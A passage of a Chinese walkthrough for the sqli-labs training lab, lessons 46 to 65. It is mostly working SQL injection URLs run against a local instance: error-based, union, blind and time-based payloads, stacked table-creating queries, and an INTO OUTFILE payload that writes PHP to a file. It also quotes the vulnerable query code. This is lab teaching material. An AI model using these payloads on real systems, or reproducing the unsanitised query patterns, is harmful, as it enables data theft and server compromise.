http://127.0.0.1:8081/sqli-labs/Less-46/?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))
#也可以导入导出文件into outfile 参数

源码分析

$sql = "SELECT * FROM users ORDER BY $id";

Less-47 - ORDER BY Clause-Error-Single quote

手动注入

47.png

http://127.0.0.1:8081/sqli-labs/Less-47/?sort=1'into outfile "文件地址"lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+

Less-48 - ORDER BY Clause Blind based

手动注入

布尔盲注、延时注入及对文件操作均可,除不能报错注入外同Less-46

Less49 - ORDER BY Clause Blind based

手动注入

除不能报错注入外同Less-47

Less50 - ORDER BY Clause Blind based

手动注入

http://127.0.0.1:8081/sqli-labs/Less-50/?sort=1;create table less50 like users

50.png

Less-51 - ORDER BY Clause Blind based

手动注入

http://127.0.0.1:8081/sqli-labs/Less-51/?sort=1';create table less51 like users--+

Less-52 - ORDER BY Clause Blind based

手动注入

http://127.0.0.1:8081/sqli-labs/Less-52/?sort=1;create table less52 like users

Less-53 - ORDER BY Clause Blind based

手动注入

http://127.0.0.1:8081/sqli-labs/Less-53/?sort=1';create table less53 like users--+

Page-4 (Challenges)

Less-54:Challenge-1

手动注入

#获取表名cul94axau9
http://127.0.0.1:8081/sqli-labs/Less-54/index.php?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
#获取列名id,sessid,secret_B27K,tryy
http://127.0.0.1:8081/sqli-labs/Less-54/index.php?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='cul94axau9'--+
#获取答案
http://127.0.0.1:8081/sqli-labs/Less-54/index.php?id=-1'union select 1,2,group_concat(secret_B27K) from challenges.cul94axau9--+

54.png

Less-55:Challenge-2

手动注入

#获取表名k6cm9525rm
http://127.0.0.1:8081/sqli-labs/Less-55/index.php?id=-1)union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+
#获取列名id,sessid,secret_6TMN,tryy
http://127.0.0.1:8081/sqli-labs/Less-55/index.php?id=-1)union select 1,2,group_concat(column_name) from information_schema.columns where table_name='k6cm9525rm'--+
#获取答案
http://127.0.0.1:8081/sqli-labs/Less-55/index.php?id=-1)union select 1,2,group_concat(secret_6TMN) from challenges.k6cm9525rm--+

55.png

Less-56:Challenge-3

手动注入

本关使用('')处理输入

http://127.0.0.1:8081/sqli-labs/Less-56/?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

源码分析

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

Less-57:Challenge-4

手动注入

本关使用""处理输入

http://127.0.0.1:8081/sqli-labs/Less-57/?id=-1"union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

源码分析

$id= '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

Less-58:Challenge-5

手动注入

报错注入

http://127.0.0.1:8081/sqli-labs/Less-58/?id=-1'union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

Less-59:Challenge-6

手动注入

报错注入

http://127.0.0.1:8081/sqli-labs/Less-59/?id=-1 union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

源码分析

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

Less-60:Challenge-7

手动注入

报错注入

http://127.0.0.1:8081/sqli-labs/Less-60/?id=-1")union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

源码分析

$id = '("'.$id.'")';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

Less-61:Challenge-8

手动注入

报错注入

http://127.0.0.1:8081/sqli-labs/Less-61/?id=-1'))union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

源码分析

$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";

Less-62:Challenge-9

手动注入

延时注入(可以使用脚本)

http://127.0.0.1:8081/sqli-labs/Less-61/?id=1')and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79,0,sleep(10))--+

源码分析

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

Less-63:Challenge-10

手动注入

同Less-62,使用延时注入。

源码分析

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

Less-64:Challenge-11

手动注入

同Less-62,使用延时注入。

源码分析

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

Less-65:Challenge-12

手动注入

同Less-62,使用延时注入。

源码分析

$id = '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

常用方法总结

一般流程

Mysql 有一个系统数据库information_schema,存储着所有的数据库的相关信息,一般的,我们利用该表可以进行一次完整的注入。以下为一般的流程。

猜数据库

select schema_name from information_schema.schemata
select group_concat(schema_name) from information_schema.schemata
select 1,group_concat(schema_name),3 from information_schema.schemata

猜某库的数据表

select table_name from information_schema.tables where table_schema='xxxxx'
select group_concat(table_name) from information_schema.tables where table_schema='xxxxx'
select 1,group_concat(table_name),3 from information_schema.tables where table_schema='xxxxx'

猜某表的所有列

Select column_name from information_schema.columns where table_name='xxxxx'
select group_concat(column_name) from information_schema.columns where table_name='xxxxx'
select 1,group_concat(column_name),3 from information_schema.columns where table_name='xxxxx'

获取某列的内容

Select xxxx from xxxxxx 

上述知识参考用例:less1-less4